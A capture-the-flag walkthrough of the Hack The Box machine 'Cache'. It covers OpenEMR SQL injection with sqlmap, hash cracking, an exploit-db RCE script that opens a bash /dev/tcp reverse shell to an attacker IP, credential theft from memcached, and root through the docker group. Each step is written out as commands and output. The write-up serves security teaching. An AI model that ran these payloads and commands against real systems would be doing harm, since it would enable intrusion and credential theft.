
Cache is a linux machine rated as medium from Hack The Box, it consists on enumerating to find another website running OpenEMR, then pivoting to a user with credentials obtained from the initial web and finally obtain root access by exploiting memcached and abusing docker group privileges.
Enumeration
Running nmap :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
nmap -sC -sV 10.10.10.188
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-04 15:41 CEST
Nmap scan report for 10.10.10.188
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Browsing to port 80 we find the following page :
There is a login page but we do not have credentials, inspecting the source code there is a jquery function visible which contains the credentials:
We can login but it is a rabbithole
Then, enumerating the web we find an about page and see that the author has other project called hms, we can add it to /etc/hosts as hms.htb :
Visiting
Exploitation
I found a youtube PoC exploit for it
I try to create a user as the PoC and then save the following request :
1
2
3
4
5
6
7
8
9
10
cat request.txt
GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=nc6uq0oms8l5hcqja5cg7fkpul; PHPSESSID=q7ftl9ojp1vaej54d4esd4phlo
Upgrade-Insecure-Requests: 1
Using sqlmap and the previous request, databases can be enumerated :
1
2
3
4
sqlmap -r request.txt --threads=10 --dbs
available databases [2]
[*] information_schema
[*] openemr
Now we dump tables:
1
2
3
4
5
sqlmap -r request.txt --threads=10 -D openemr --tables
user_settings
| users
| users_facility
| users_secure
users_secure seems to be the table we are looking , we will dump its contents:
1
sqlmap -r request.txt --threads=10 -D openemr -T users_secure --dump
From it we obtain openemr_admin and a hashed password : $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.
This password will be cracked with john:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt
?:xxxxxx
1 password hash cracked, 0 left
```hms
Now that we have credentials we can use the following RCE exploit to obtain a reverse shell : <https://www.exploit-db.com/exploits/45161>:
```shell
python openemr.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.46/443 0>&1'
.---. ,---. ,---. .-. .-.,---. ,---.
/ .-. ) | .-.\ | .-' | \| || .-' |\ /|| .-.\
| | |(_)| |-' )| `-. | | || `-. |(\ / || `-'/
| | | | | |--' | .-' | |\ || .-' (_)\/ || (
\ `-' / | | | `--.| | |)|| `--.| \ / || |\ \
)---' /( /( __.'/( (_)/( __.'| |\/| ||_| \)\
(_) (__) (__) (__) (__) '-' '-' (__)
={ P R O J E C T I N S E C U R I T Y }=
Twitter : @Insecurity
Site : insecurity.sh
[$] Authenticating with openemr_admin:xxxxxx
[$] Injecting payload
And we obtain a reverse shell as www-data:
1
2
3
4
5
6
7
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.46] from (UNKNOWN) [10.10.10.188] 36386
bash: cannot set terminal process group (1811): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cache:/var/www/hms.htb/public_html/interface/main$ whoami
www-data
User ash is available in the system so we can su into him with the credentials found in the website:
1
2
3
4
www-data@cache:/home$ su ash
Password:
ash@cache:/home$ whoami
ash
Privilege Escalation
Listing services running locally found port 11211 open :
1
2
3
4
5
6
7
8
ash@cache:/home$ ss -tnl
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 128 127.0.0.1:11211 0.0.0.0:*
LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 *:80 *:*
LISTEN 0 128 [::]:22 [::]:*
This port corresponds to memcached from which we can dump stored data.
We can connect to it through telnet :
1
2
3
4
5
6
7
8
9
10
11
12
13
ash@cache:/home$ telnet localhost 11211
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
stats cachedump 1 0
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END
Then, we can retrieve the user and password :
1
2
3
4
5
6
7
8
get user
VALUE user 0 5
luffy
END
get passwd
VALUE passwd 0 9
0n3_p1ec3
END
With this credentials we can login as luffy via ssh:
1
ssh luffy@10.10.10.188
After having logged in we see user luffy belongs to the docker group :
1
2
luffy@cache:~$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
A root shell can be obtained following gtfobins
1
2
3
4
5
luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root